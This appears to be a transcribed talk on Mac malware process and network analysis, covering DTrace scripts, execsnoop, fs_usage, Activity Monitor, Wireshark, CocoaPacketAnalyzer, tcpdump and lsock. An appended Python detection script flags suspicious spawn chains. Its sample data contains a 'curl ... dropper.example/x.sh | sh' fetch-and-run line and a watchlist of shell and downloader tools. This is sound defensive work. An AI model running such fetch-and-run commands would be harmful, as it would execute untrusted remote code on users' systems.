Read previous part: Reverse Engineering Mac Malware 4 - File Analysis
Sarah Edwards now turns to the fundamentals of scrutinizing Mac malware, process analysis and network analysis, with tools and examples included.
Process analysis: you've got a couple of DTrace scripts, some fs_usage again, and some more data on applications.
So, we want to snoop new processes, we want to see what's being executed, what's spawning new processes. newproc.d shows us the process along with its parent process, the timestamp, whether it's a 32-bit or 64-bit executable, the command line arguments and things like that. A couple of examples here I'll point out. One of the lines at the top is when I double-clicked the Notes application; it had a bunch of different things executing with it: framework stuff, XPC stuff – it's all services. I did a 'man ifconfig'. It's quick and easy. And I did an 'open -a TextWrangler', I opened TextWrangler from the command line. So, interesting information there.
Then, with new processes we use ‘execsnoop’. This is one of my favorites. It does the relative time, it does the current time, UID, PID, parent ID, and arguments. Pretty darn concise, too, which is why I like it. You easily see on the command line what’s getting run at that time. It is not too verbose.
Again, fs_usage, the ‘-f exec’ filter – a lot of the same information: timestamp, new process, new path.
It covers 'posix_spawn', that's across one process; 'execve' is a new process. You see 'bin', 'sh', 'man', 'tbl', 'groff' – these are all command line tools that we might be interested in. Malware might be using some different ones; that's basically the domino man page lookup.
Real-time process analysis. This is basically a Terminal version, Mac version of Process Explorer. It’s equipped with a few more functionalities and coloring.
The screenshot sucks, I know. But you can’t make Terminal stuff look good, it’s just impossible. We have a bunch of different columns here. It’s interactive, so you can click down, press Enter and more information will pop up about that process; this is shown in the lower screenshot. I can see it’s 64-bit, I can see the size of virtual memory it’s using, what other processes are executing underneath it, things like that.
Then, of course, we have the Activity Monitor. This is, obviously, native. Whenever a process is taking up a lot of RAM on your computer and you are wondering why it’s so hot and the fan is running so hard, this is what you are going to open up and kill the process. It’s very much like the Task Manager on Windows, pretty much the same thing.
So, network analysis. Wireshark is always popular in the Windows world. There's also CocoaPacketAnalyzer; let's get into it.
So, CocoaPacketAnalyzer is a Mac-only tool. It’s very similar to Wireshark. It’s kind of interesting because it caches packets, so it’s not completely live, which bugs the hell out of me. But it is really nice. When it comes down to it, it’s pretty damn slick.
Let’s move on to Wireshark, the all time favorite. I had a hell of a time when I was running this software in VMs. I usually have a clean VM and dirty VM while doing analysis. Wireshark will not frickin’ install on 10.7 or 10.8 systems in a VM. It shows up blank, and I’m like: “Are you kidding me? What am I doing wrong?” I know some VMs can be a little bit buggy, especially when it comes to video stuff. When you have to open up Safari or open up iWork stuff, you will have a full page of text that will show up blank. So it has some issues, be aware of that. Wireshark does work in a 10.9 VM. So FYI: it’s not you, it’s that.
So, command line version – we've got two options. We've got good ol' tcpdump, with a couple of options here: one with content and one without content. I like to see the content of the packets when it's rolling through, see if it's peeking into certain things – I want to see that live, so I personally like the option with content.
You can also do network analysis with Activity Monitor. You can see which applications are using more network throughput.
And one more, this is like a TCP view type of thing, it’s called ‘lsock’. It was written by the guy who did the new OS X Internals book. Look it up, it’s a great book; I highly recommend it. I read it at night.
And with that being said, thanks for your attention!
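An added example, not code from the talk, tying the process analysis section together (newproc.d, execsnoop and fs_usage -f exec all give you the same raw material: who spawned what). This Python script reads execsnoop-style output, rebuilds parent/child spawn chains from the PID/PPID columns, and flags shells, interpreters and downloaders whose ancestry leads back to a binary inside an .app bundle, which is the man-to-sh-to-tbl-to-groff pattern from the talk turned into a detection rule. The column layout (execsnoop's default UID PID PPID ARGS header), the sample capture, the Invoice.app bundle and the dropper.example host are all constructed for illustration.

```python
"""Triage execsnoop-style process output: rebuild spawn chains from the
PID/PPID columns and flag interpreters or downloaders launched from inside
an application bundle. Editor's example; not code from the talk."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Assumption: execsnoop's default "UID PID PPID ARGS" columns (no -v
# timestamps). Anything that is not three integers followed by a command
# (e.g. the header line) is skipped.
LINE_RE = re.compile(r"^\s*(\d+)\s+(\d+)\s+(\d+)\s+(\S.*?)\s*$")

# Commands worth a second look when a GUI app, not a terminal, starts them.
INTERESTING = {"sh", "bash", "zsh", "osascript", "python", "perl",
               "curl", "nc", "chmod", "launchctl"}

# Constructed sample capture (not a real snoop): a benign `man ifconfig`
# chain, then a double-clicked Invoice.app that shells out to curl | sh.
SAMPLE = """\
  UID    PID   PPID ARGS
  501   4312   4301 man ifconfig
  501   4313   4312 sh -c tbl | groff -Tascii -mandoc
  501   4314   4313 tbl
  501   4315   4313 groff -Tascii -mandoc
  501   4400      1 /Applications/Invoice.app/Contents/MacOS/Invoice
  501   4401   4400 sh -c curl -fsSL http://dropper.example/x.sh | sh
  501   4402   4401 curl -fsSL http://dropper.example/x.sh
  501   4403   4401 sh
  501   4404   4403 chmod +x /tmp/.x
"""


@dataclass
class Exec:
    uid: int
    pid: int
    ppid: int
    args: str

    @property
    def name(self) -> str:
        """Basename of argv[0]: '/bin/sh -c ...' -> 'sh'."""
        return self.args.split()[0].rsplit("/", 1)[-1]

    @property
    def in_app_bundle(self) -> bool:
        """True when argv[0] lives inside a .app bundle's MacOS directory."""
        return ".app/Contents/MacOS/" in self.args.split()[0]


def parse_execsnoop(text: str) -> List[Exec]:
    execs = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            uid, pid, ppid, args = m.groups()
            execs.append(Exec(int(uid), int(pid), int(ppid), args))
    return execs


def spawn_chain(e: Exec, by_pid: Dict[int, Exec]) -> List[Exec]:
    """Ancestors of e that appear in the capture, root first, e last.
    The seen-set stops a loop if a PID was reused during the capture."""
    chain, seen, cur = [e], {e.pid}, e
    while cur.ppid in by_pid and cur.ppid not in seen:
        cur = by_pid[cur.ppid]
        seen.add(cur.pid)
        chain.append(cur)
    chain.reverse()
    return chain


def find_suspicious(text: str) -> List[str]:
    """Return 'root -> ... -> leaf' chains for INTERESTING commands whose
    ancestry includes an app-bundle binary. A parent outside the capture
    (e.g. a Terminal started before snooping began) simply ends the chain,
    so the benign man -> sh -> tbl chain is never reported."""
    execs = parse_execsnoop(text)
    by_pid = {e.pid: e for e in execs}
    hits = []
    for e in execs:
        if e.name not in INTERESTING:
            continue
        chain = spawn_chain(e, by_pid)
        if any(a.in_app_bundle for a in chain[:-1]):
            hits.append(" -> ".join(a.name for a in chain))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE):
        print("suspicious spawn chain:", hit)
```

In practice you would redirect execsnoop's output to a file while detonating the sample and feed that file to find_suspicious instead of SAMPLE; if you run execsnoop with -v, extend LINE_RE to skip the leading timestamp column. DTrace-based snooping needs root on the 10.7 through 10.9 systems the talk discusses, and later macOS releases restrict DTrace under System Integrity Protection, so the same chain reconstruction can be driven from fs_usage -f exec or Endpoint Security output with only the parser changed.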